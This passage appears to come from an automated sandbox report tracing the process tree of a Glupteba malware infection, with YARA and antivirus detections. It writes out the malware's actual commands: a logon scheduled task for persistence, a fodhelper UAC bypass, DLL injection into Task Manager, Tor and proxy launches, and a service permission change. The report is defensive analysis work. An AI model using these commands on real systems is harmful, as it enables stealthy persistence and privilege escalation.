                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                          Imagebase:0x7ff6642e0000
                                                          File size:235008 bytes
                                                          MD5 hash:796B784E98008854C27F4B18D287BA30
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:33
                                                          Start time:11:31:16
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:34
                                                          Start time:11:31:16
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks /delete /tn ScheduledUpdate /f
                                                          Imagebase:0x7ff6642e0000
                                                          File size:235008 bytes
                                                          MD5 hash:796B784E98008854C27F4B18D287BA30
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:35
                                                          Start time:11:31:16
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:36
                                                          Start time:11:31:16
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Target ID:37
                                                          Start time:11:31:17
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:38
                                                          Start time:11:31:18
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Target ID:39
                                                          Start time:11:31:18
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:40
                                                          Start time:11:31:18
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\rss\csrss.exe
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000028.00000003.208837272188.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

                                                          Target ID:41
                                                          Start time:11:31:21
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Target ID:42
                                                          Start time:11:31:21
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:43
                                                          Start time:11:31:21
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\rss\csrss.exe"
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

                                                          Target ID:44
                                                          Start time:11:31:23
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Sysnative\cmd.exe /C fodhelper
                                                          Imagebase:0x7ff7d3a70000
                                                          File size:289792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Target ID:45
                                                          Start time:11:31:23
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Target ID:46
                                                          Start time:11:31:24
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\fodhelper.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:fodhelper
                                                          Imagebase:0x7ff697a80000
                                                          File size:49664 bytes
                                                          MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Target ID:47
                                                          Start time:11:31:24
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\fodhelper.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\fodhelper.exe"
                                                          Imagebase:0x7ff697a80000
                                                          File size:49664 bytes
                                                          MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Target ID:49
                                                          Start time:11:31:24
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\fodhelper.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\system32\fodhelper.exe"
                                                          Imagebase:0x7ff697a80000
                                                          File size:49664 bytes
                                                          MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:50
                                                          Start time:11:31:25
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\rss\csrss.exe"
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000032.00000003.208899557160.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                          Target ID:51
                                                          Start time:11:31:27
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Target ID:52
                                                          Start time:11:31:27
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:53
                                                          Start time:11:31:27
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Target ID:54
                                                          Start time:11:31:27
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:55
                                                          Start time:11:31:29
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\rss\csrss.exe
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000037.00000003.208942288673.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000037.00000003.208942288673.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

                                                          Target ID:56
                                                          Start time:11:31:31
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Target ID:57
                                                          Start time:11:31:31
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:58
                                                          Start time:11:31:31
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\rss\csrss.exe
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000003A.00000003.208966850463.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000003A.00000003.208966850463.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security

                                                          Target ID:59
                                                          Start time:11:31:34
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Target ID:60
                                                          Start time:11:31:34
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:61
                                                          Start time:11:31:38
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\rss\csrss.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\rss\csrss.exe
                                                          Imagebase:0x400000
                                                          File size:4379008 bytes
                                                          MD5 hash:01FE6BA28D82175D35665B3EB6ED8CEA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000003D.00000003.209030995606.0000000004141000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000003D.00000003.209030995606.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

                                                          Target ID:62
                                                          Start time:11:31:40
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:powershell -nologo -noprofile
                                                          Imagebase:0xb0000
                                                          File size:433152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET

                                                          Target ID:63
                                                          Start time:11:31:40
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:64
                                                          Start time:11:32:04
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\mountvol.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:mountvol B: /s
                                                          Imagebase:0x580000
                                                          File size:15360 bytes
                                                          MD5 hash:E0B3FFF7584298E77DFFB50796839FED
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:65
                                                          Start time:11:32:04
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:66
                                                          Start time:11:32:04
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\mountvol.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:mountvol B: /d
                                                          Imagebase:0x580000
                                                          File size:15360 bytes
                                                          MD5 hash:E0B3FFF7584298E77DFFB50796839FED
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:67
                                                          Start time:11:32:04
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:68
                                                          Start time:11:32:05
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\mountvol.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:mountvol B: /s
                                                          Imagebase:0x580000
                                                          File size:15360 bytes
                                                          MD5 hash:E0B3FFF7584298E77DFFB50796839FED
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:69
                                                          Start time:11:32:05
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:70
                                                          Start time:11:32:05
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\mountvol.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:mountvol B: /d
                                                          Imagebase:0x580000
                                                          File size:15360 bytes
                                                          MD5 hash:E0B3FFF7584298E77DFFB50796839FED
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:71
                                                          Start time:11:32:05
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:72
                                                          Start time:11:32:05
                                                          Start date:28/05/2023
                                                          Path:C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                          Imagebase:0x7ff769b70000
                                                          File size:288256 bytes
                                                          MD5 hash:D98E33B66343E7C96158444127A117F6
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 92%, ReversingLabs

                                                          Target ID:73
                                                          Start time:11:32:05
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:74
                                                          Start time:11:32:06
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\shutdown.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:shutdown -r -t 5
                                                          Imagebase:0x7f0000
                                                          File size:23552 bytes
                                                          MD5 hash:FCDE5AF99B82AE6137FB90C7571D40C3
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:75
                                                          Start time:11:32:06
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:76
                                                          Start time:11:32:13
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                          Imagebase:0x7ff6642e0000
                                                          File size:235008 bytes
                                                          MD5 hash:796B784E98008854C27F4B18D287BA30
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:77
                                                          Start time:11:32:14
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:78
                                                          Start time:11:32:19
                                                          Start date:28/05/2023
                                                          Path:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\user\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\user\AppData\Local\Temp\csrss\tor\log.txt
                                                          Imagebase:0xfb0000
                                                          File size:4466702 bytes
                                                          MD5 hash:055AE7C584A7B012955BF5D874F30CFA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs

                                                          Target ID:79
                                                          Start time:11:32:20
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                          Imagebase:0x690000
                                                          File size:236544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:80
                                                          Start time:11:32:20
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:81
                                                          Start time:11:32:20
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\SysWOW64\sc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                          Imagebase:0x1b0000
                                                          File size:61440 bytes
                                                          MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:82
                                                          Start time:11:34:16
                                                          Start date:28/05/2023
                                                          Path:C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466
                                                          Imagebase:0x70000
                                                          File size:7344128 bytes
                                                          MD5 hash:61275FE567B258A897943911C450E57E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 2%, ReversingLabs

                                                          Target ID:83
                                                          Start time:11:34:17
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:84
                                                          Start time:11:37:13
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                          Imagebase:0x7ff6642e0000
                                                          File size:235008 bytes
                                                          MD5 hash:796B784E98008854C27F4B18D287BA30
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:85
                                                          Start time:11:37:13
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          No disassembly